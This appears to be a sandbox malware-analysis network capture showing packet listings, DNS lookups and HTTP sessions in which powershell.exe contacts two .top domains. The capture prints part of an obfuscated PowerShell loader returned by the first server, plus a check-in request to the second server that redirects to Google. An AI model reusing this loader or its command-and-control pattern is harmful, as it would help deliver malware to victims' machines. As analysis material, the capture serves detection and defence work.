                                                                                                  Nov 15, 2024 18:23:51.570069075 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570094109 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570103884 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.570138931 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570254087 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.570327044 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.570440054 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570444107 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570652008 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.688074112 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.688088894 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.688380957 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.692334890 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.692348003 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.692591906 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.700983047 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.700995922 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.701184034 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.709561110 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.709574938 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.709813118 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.718167067 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.718271971 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.718458891 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.726759911 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.726773977 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.727081060 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.735405922 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.735420942 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.735759020 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.744019985 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.744034052 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.744307041 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.752785921 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.752815962 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.753038883 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.761256933 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.761303902 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.761625051 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.806279898 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.806309938 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.806581020 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.810542107 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.810595036 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.810859919 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.819329023 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.819346905 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.819633961 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.826555014 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.826662064 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.826926947 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.833997011 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.834036112 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.834265947 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.841367960 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.841487885 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.841720104 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.848841906 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.848855972 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.849149942 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.856281042 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.856293917 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.856523991 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.863729000 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.913218021 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:52.010395050 CET4976480192.168.11.20206.188.196.37
                                                                                                  Nov 15, 2024 18:23:52.010422945 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:52.010459900 CET4976580192.168.11.2074.125.136.106

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 15, 2024 18:23:47.125778913 CET5333453192.168.11.201.1.1.1
                                                                                                  Nov 15, 2024 18:23:47.317055941 CET53533341.1.1.1192.168.11.20
                                                                                                  Nov 15, 2024 18:23:50.224180937 CET5661953192.168.11.201.1.1.1
                                                                                                  Nov 15, 2024 18:23:50.405613899 CET53566191.1.1.1192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.157783031 CET5466853192.168.11.201.1.1.1
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET53546681.1.1.1192.168.11.20

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Nov 15, 2024 18:23:47.125778913 CET192.168.11.201.1.1.10xae87Standard query (0)sfibhzu3ubhza.topA (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:50.224180937 CET192.168.11.201.1.1.10x8cb2Standard query (0)gidcldeaccadneh.topA (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.157783031 CET192.168.11.201.1.1.10xe3b0Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Nov 15, 2024 18:23:47.317055941 CET1.1.1.1192.168.11.200xae87No error (0)sfibhzu3ubhza.top206.188.196.25A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:50.405613899 CET1.1.1.1192.168.11.200x8cb2No error (0)gidcldeaccadneh.top206.188.196.37A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET1.1.1.1192.168.11.200xe3b0No error (0)www.google.com74.125.136.106A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET1.1.1.1192.168.11.200xe3b0No error (0)www.google.com74.125.136.147A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET1.1.1.1192.168.11.200xe3b0No error (0)www.google.com74.125.136.105A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET1.1.1.1192.168.11.200xe3b0No error (0)www.google.com74.125.136.104A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET1.1.1.1192.168.11.200xe3b0No error (0)www.google.com74.125.136.99A (IP address)IN (0x0001)false
                                                                                                  Nov 15, 2024 18:23:51.277218103 CET1.1.1.1192.168.11.200xe3b0No error (0)www.google.com74.125.136.103A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • sfibhzu3ubhza.top
                                                                                                  • gidcldeaccadneh.top
                                                                                                  • www.google.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.11.2049763206.188.196.25801796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 15, 2024 18:23:47.539793968 CET177OUTGET /1.php?s=mints21 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                  Host: sfibhzu3ubhza.top
                                                                                                  Connection: Keep-Alive
                                                                                                  Nov 15, 2024 18:23:48.092417955 CET1289INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Fri, 15 Nov 2024 17:23:47 GMT
                                                                                                  Content-Type: text/plain
                                                                                                  Content-Length: 20113
                                                                                                  Connection: keep-alive
                                                                                                  Data Raw: 24 68 6f 70 66 72 65 64 3d 24 65 78 65 63 75 74 69 6f 6e 63 6f 6e 74 65 78 74 3b 24 6f 72 65 6e 65 6e 69 6e 61 6e 61 74 65 73 61 6e 61 6e 6f 6e 61 74 61 6c 65 6e 65 72 6f 6e 72 65 65 64 61 72 62 65 20 3d 20 28 2d 4a 6f 49 4e 20 28 40 28 28 34 36 30 33 2d 28 34 34 30 33 39 34 35 30 2f 28 36 32 37 35 38 36 33 36 2f 28 37 31 39 34 2d 37 31 30 29 29 29 29 2c 28 31 36 30 32 36 34 2f 33 30 38 32 29 2c 28 35 32 38 2d 28 38 30 36 35 2d 37 35 39 34 29 29 2c 28 2d 38 30 30 32 2b 38 30 35 32 29 2c 28 33 33 34 32 2d 28 34 32 34 35 35 31 32 2f 31 32 39 32 29 29 2c 28 31 30 34 37 30 36 2f 28 2d 32 32 35 33 2b 28 2d 31 38 37 33 2b 36 30 36 35 29 29 29 2c 28 31 37 35 39 35 32 2f 28 31 32 38 34 34 2d 28 38 35 31 34 2b 28 39 34 38 34 2d 38 32 39 36 29 29 29 29 2c 28 2d 32 31 30 38 2b 28 31 31 39 36 34 2d 39 38 30 31 29 29 2c 28 2d 37 37 34 36 2b 37 38 30 31 29 2c 28 31 31 32 31 35 30 2f 32 32 34 33 29 2c 28 31 38 37 32 36 34 2f 33 33 34 34 29 2c 28 34 36 35 33 2d 34 36 30 35 29 2c 28 2d 39 34 34 32 2b 39 34 39 31 29 [TRUNCATED]
                                                                                                  Data Ascii: $hopfred=$executioncontext;$oreneninanatesananonataleneronreedarbe = (-JoIN (@((4603-(44039450/(62758636/(7194-710)))),(160264/3082),(528-(8065-7594)),(-8002+8052),(3342-(4245512/1292)),(104706/(-2253+(-1873+6065))),(175952/(12844-(8514+(9484-8296)))),(-2108+(11964-9801)),(-7746+7801),(112150/2243),(187264/3344),(4653-4605),(-9442+9491),(337920/(-600+6744)),(4097-4045),(3998-(10619-(11538-4861))),(-7981+(3942+(9965-5872))),(-3461+3517),(315-(-9357+9616)),(-4122+(12759089/(8312-(9793-4540)))),(114-60),(6184-6128),(-9342+(2979+6418)),(-10020+(10711-639)),(3669-(34907626/9659)),(832-782),(-5974+(13706-7676)),(-4736+(6094-1310)),(999-(-1005+1949)),(-2213+(5652-(26993385/7965))),(9996-(20123-(25304755/2485))),(6321/(-247+(-4488+4864))),(-3229+3285),(133265/2423),(-9289+(21066528/2256)),(-6823+(9312-(15760150/6475))),(216801/(8170-3919)),(4714-(-1951+6611)),(-5346+5402),(5999-5943),(1651-1595),(324060/(11318532/1921)),(125440/(11348-(91799532/10079))),(-8290+(14884-(-626+7170))),(199864/(7728-4159)),(13 [TRUNCATED]
                                                                                                  Nov 15, 2024 18:23:48.092439890 CET1289INData Raw: 28 38 39 34 34 2d 38 38 38 38 29 2c 28 31 32 38 38 35 30 2f 32 35 37 37 29 2c 28 31 33 34 32 38 38 2f 32 33 39 38 29 29 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 20 5b 63 68 61 72 5d 24 5f 20 7d 29 29 3b 24 65 6e 61 72 65 6e 65 72 61
                                                                                                  Data Ascii: (8944-8888),(128850/2577),(134288/2398))| ForEach-Object { [char]$_ }));$enareneranatestionororonesoroninereris = (-JOiN (@((8362-(76379844/(13050-(12765-8903)))),(291256/(12666-(9430-(10946-(2175+6063))))),(-8278+8333),(468027/9177),(8959-(81
                                                                                                  Nov 15, 2024 18:23:48.092454910 CET1289INData Raw: 65 6e 69 6e 61 6e 61 74 65 73 61 6e 61 6e 6f 6e 61 74 61 6c 65 6e 65 72 6f 6e 72 65 65 64 61 72 62 65 20 2b 20 24 65 6e 61 72 65 6e 65 72 61 6e 61 74 65 73 74 69 6f 6e 6f 72 6f 72 6f 6e 65 73 6f 72 6f 6e 69 6e 65 72 65 72 69 73 29 2e 28 28 5b 43
                                                                                                  Data Ascii: eninanatesananonataleneronreedarbe + $enareneranatestionororonesoroninereris).(([CHaR[]]@((-3324+(-2958+(25574570/4018))),(160-43),(1176/(8452-8440)),(-7048+7163),(-4214+4330),(558600/4900),(662340/6308),(123420/1122),(-3710+3813)) -join ''))(
                                                                                                  Nov 15, 2024 18:23:48.092600107 CET1289INData Raw: 30 38 31 33 38 31 35 33 31 30 37 27 20 2b 20 27 31 34 32 31 33 38 31 34 35 31 33 37 27 29 2e 53 75 62 73 74 72 69 6e 67 28 24 28 24 5f 20 2a 20 33 29 2c 20 33 29 20 2d 20 33 37 29 7d 29 29 28 24 74 69 6f 6e 65 72 65 72 65 6e 6f 72 61 74 69 73 69
                                                                                                  Data Ascii: 08138153107' + '142138145137').Substring($($_ * 3), 3) - 37)}))($tionererenoratisinesinenalesererer, ([chAR[]]@((4356-(3362+916)),(216006/(7230-(9947-4663))),(63360/576),(660560/(186+8071)),(1181934/(1873+8229)),(-5107+(45096120/8664)),(644220
                                                                                                  Nov 15, 2024 18:23:48.092628002 CET1289INData Raw: 39 33 34 39 36 34 2f 33 34 34 36 29 29 2c 28 31 38 34 37 33 34 2f 28 37 30 39 34 2d 28 36 32 36 38 2d 32 35 39 35 29 29 29 2c 28 31 38 34 30 38 30 2f 33 35 34 30 29 2c 28 34 34 38 30 33 34 2f 28 2d 31 32 30 2b 35 35 31 38 29 29 2c 28 2d 39 39 33
                                                                                                  Data Ascii: 934964/3446)),(184734/(7094-(6268-2595))),(184080/3540),(448034/(-120+5518)),(-993+1109),(7218-(15907-(-196+8999))),(864045/(7238+(8813-(15016-7194)))),(-7102+7212),(7262-(2439+(2260880/479))))| ForEach-Object { [char]$_ }))).(([char[]]@((-295
                                                                                                  Nov 15, 2024 18:23:48.092643023 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 24 68 63 69 62 73 6d 6e 67 71 35 36 6a 72 6b 65 2b 2b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 68 63 69 62 73 6d 6e 67 71 35 36 6a 72 6b 65 20 2d 67 65 20 24 34 37 78 76 79 32 6e 68 33 73 62 38 72 6a 30
                                                                                                  Data Ascii: $hcibsmngq56jrke++ if ($hcibsmngq56jrke -ge $47xvy2nh3sb8rj0.((-join (@((600932/(14990-7083)),(3695-3594),(-439+(9027-(1600+(10355-3477)))),(-5875+(1032+(21792076/4406))),(7852-7736),(5156-5052))| ForEach-Object { [char]$
                                                                                                  Nov 15, 2024 18:23:48.092963934 CET1289INData Raw: 30 34 2d 38 35 31 29 29 29 29 29 2c 28 2d 36 35 34 38 2b 36 36 36 33 29 2c 28 34 35 36 38 30 38 2f 33 39 33 38 29 2c 28 36 36 39 36 33 30 2f 36 36 33 30 29 2c 28 31 31 31 31 32 35 35 2f 28 31 34 34 35 34 2d 34 32 35 39 29 29 2c 28 36 31 33 39 2d
                                                                                                  Data Ascii: 04-851))))),(-6548+6663),(456808/3938),(669630/6630),(1111255/(14454-4259)),(6139-(8428-(9856035/4221))),(57816/792),(744180/(11093-(15003464/(5754+3214)))),(-5916+(41263002/6921)),(-5974+6051),(-4784+4885),(2232-(7869961/3707)),(886779/(1+(10
                                                                                                  Nov 15, 2024 18:23:48.093003035 CET1289INData Raw: 29 29 29 29 29 29 28 20 24 71 6b 33 74 34 76 63 78 77 66 64 39 67 62 36 20 29 0d 0a 20 20 20 20 20 20 20 20 24 62 31 67 73 6d 39 6e 74 63 6b 34 68 35 30 37 2e 28 28 2d 6a 6f 69 6e 20 28 40 28 28 2d 34 36 37 39 2b 28 32 30 31 37 30 35 30 2f 34 32
                                                                                                  Data Ascii: ))))))( $qk3t4vcxwfd9gb6 ) $b1gsm9ntck4h507.((-join (@((-4679+(2017050/425)),(-43+151),(-3835+(9923-5977)),(7690-7575),(-4684+4785))| ForEach-Object { [char]$_ })))()$smhw5bovtk7cz9j.(([system.String]::new(@((-4801+4868),(10033-99
                                                                                                  Nov 15, 2024 18:23:48.093018055 CET1289INData Raw: 67 2f 39 72 31 75 54 4a 6a 75 56 4a 78 70 7a 67 2b 49 37 49 61 7a 4c 72 49 34 71 66 67 37 4f 43 53 35 49 64 43 6b 43 57 71 51 35 68 4c 2b 4b 76 73 76 37 38 52 55 53 38 35 4f 4a 67 38 69 6b 6f 5a 52 4c 35 6c 34 51 77 70 61 54 34 45 54 51 36 39 35
                                                                                                  Data Ascii: g/9r1uTJjuVJxpzg+I7IazLrI4qfg7OCS5IdCkCWqQ5hL+Kvsv78RUS85OJg8ikoZRL5l4QwpaT4ETQ695DRY3QCpSa1cHsx47phxji3dfIy9qdnoXxh90wK/brTsi6My6p5dz4+Qs49Fi4rZSAyq8G74Lui4KS53h+IQEn+Vdx1iEMi7D4Y58891ZYaaDiIkeJdU9VmIElR+KgyRHiA31Q5gEkGFg4peppAKeyyZPe4rlKF7+B
                                                                                                  Nov 15, 2024 18:23:48.093030930 CET706INData Raw: 35 68 7a 35 56 36 39 4c 56 58 62 62 4c 49 65 36 79 79 64 76 4c 54 41 6f 48 52 59 62 50 6c 4f 34 4a 4b 45 33 32 79 6e 6d 7a 61 38 37 39 6d 43 43 32 76 36 6b 36 49 47 33 45 37 68 6f 4f 5a 57 71 31 61 6d 66 59 56 77 41 2f 30 2b 49 34 4a 48 30 53 72
                                                                                                  Data Ascii: 5hz5V69LVXbbLIe6yydvLTAoHRYbPlO4JKE32ynmza879mCC2v6k6IG3E7hoOZWq1amfYVwA/0+I4JH0SrNniW/XIRuVbAgihKDbPnQXCm94Yk/rb84HMOFmyNf5r31Que2HYvZG9cNqVnvHa24KUtL/Y4OyIaVj2olNfViDM+Hw9ui4qP1xNGfD7dPtnoIghRzTHXR14zSt2Y5Y30SGt1hjF/yguc/D0Jgmd3J/gWX/Idd20zs
                                                                                                  Nov 15, 2024 18:23:48.304362059 CET1289INData Raw: 4b 76 38 31 49 64 44 35 39 4e 4e 4a 76 48 36 51 6e 50 70 4e 69 4e 48 4e 48 74 31 6d 52 39 45 77 50 62 68 6b 6a 63 4e 71 71 52 54 2f 64 34 75 4d 70 32 67 64 62 72 63 53 39 4b 74 66 39 57 30 37 74 62 78 54 31 55 64 44 61 57 72 67 71 62 47 51 38 52
                                                                                                  Data Ascii: Kv81IdD59NNJvH6QnPpNiNHNHt1mR9EwPbhkjcNqqRT/d4uMp2gdbrcS9Ktf9W07tbxT1UdDaWrgqbGQ8R3O7UHadEiQHTDc8Rk1ZzbTPvEKNHPy7rbHElF+xeb4MrJC4bV41HKm8fFTVNGlpW0rYN4hBGtc1RII8Rzm+iF+8sAMMBkGXXpnqHdJVmYfq6B6TCl5OygQBA7RakhXz9e+sed0sgNOvP/FHR0JtjTMkYMm6QkRQJ5


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.11.2049764206.188.196.37801796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 15, 2024 18:23:50.621809959 CET219OUTGET /uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                  Host: gidcldeaccadneh.top
                                                                                                  Connection: Keep-Alive
                                                                                                  Nov 15, 2024 18:23:51.155949116 CET166INHTTP/1.1 302 Found
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: keep-alive
                                                                                                  Location: http://www.google.com


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.11.204976574.125.136.106801796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 15, 2024 18:23:51.396631002 CET159OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                  Host: www.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Nov 15, 2024 18:23:51.569926023 CET1289INHTTP/1.1 200 OK
                                                                                                  Date: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                  Expires: -1
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ZnYo3RKo-yHVJpE28nHw-w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                  Server: gws
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Set-Cookie: AEC=AZ6Zc-XmTuBCp5Ka_CSau_0ePpYpCtT4Om9nOzJTCjotXuW5yZwRieAXsA; expires=Wed, 14-May-2025 17:23:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                  Set-Cookie: NID=519=hLPCwOLMGdQyv6F61uzCX2JVzUgoMiqyeJBmnuSgfGhPhH60Iv4rrWEKLtiGUMuYV16Jm7kqXQ4xQL66AHVy1hz6ztnGyAc0cwAS4rLmaj9sOobzcEQDzFLl8Qwu6u6M-H77wtMtlCCKhHj8nPBl_puGgHe7d3FUbrZYKZSZk1P9tOr3V3jB90rVZUIRUwXzBDeQ6eRuaA; expires=Sat, 17-May-2025 17:23:51 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Accept-Encoding
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Data Raw: 35 36 64 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f
                                                                                                  Data Ascii: 56d0<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to
                                                                                                  Nov 15, 2024 18:23:51.569962978 CET1289INData Raw: 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d
                                                                                                  Data Ascii: help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/logos/doodles/2024/celebrating-the-kayak-6753651837110
                                                                                                  Nov 15, 2024 18:23:51.569989920 CET1289INData Raw: 34 2c 36 2c 33 36 2c 31 2c 36 2c 31 2c 36 2c 31 2c 32 34 2c 32 37 2c 31 2c 35 2c 34 2c 31 2c 36 2c 31 2c 36 2c 31 2c 36 2c 31 2c 38 2c 31 2c 36 2c 35 2c 32 2c 31 2c 34 35 2c 31 30 2c 31 2c 33 2c 31 2c 31 2c 31 2c 38 2c 32 37 39 37 39 30 32 33 2c
                                                                                                  Data Ascii: 4,6,36,1,6,1,6,1,24,27,1,5,4,1,6,1,6,1,6,1,8,1,6,5,2,1,45,10,1,3,1,1,1,8,27979023,16673,2169858,23029351,8163,4636,16436,84045,22623,884,14280,8182,5933,8939,34557,19011,2655,3439,3319,23878,9140,4599,328,4456,1769,1116,22291,6,10210,688,18357
                                                                                                  Nov 15, 2024 18:23:51.570015907 CET1289INData Raw: 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d
                                                                                                  Data Ascii: ction(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var h=this||self;function l(){return window.google!==void 0&&window.google.
                                                                                                  Nov 15, 2024 18:23:51.570044041 CET1289INData Raw: 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62
                                                                                                  Data Ascii: a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function(a,b){if(a)var c=a.id;else{do c=Math.random
                                                                                                  Nov 15, 2024 18:23:51.570069075 CET1289INData Raw: 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61
                                                                                                  Data Ascii: px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:
                                                                                                  Nov 15, 2024 18:23:51.570094109 CET1289INData Raw: 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b
                                                                                                  Data Ascii: ;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXI
